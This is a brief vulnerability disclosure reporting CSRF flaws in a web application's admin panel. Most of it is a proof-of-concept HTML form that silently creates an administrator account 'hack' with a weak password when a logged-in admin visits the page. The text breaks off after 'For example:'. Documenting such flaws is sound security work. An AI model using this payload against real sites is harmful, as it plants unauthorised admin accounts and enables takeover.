There is two CSRF vulnerability that can add the administrator account

After the administrator logged in,open the following one page.

POC:

<html>
   <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOUR HOST/index.php/admin/admin_manage/add.html" method="POST">
      <input type="hidden" name="adminname" value="hack" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

For example: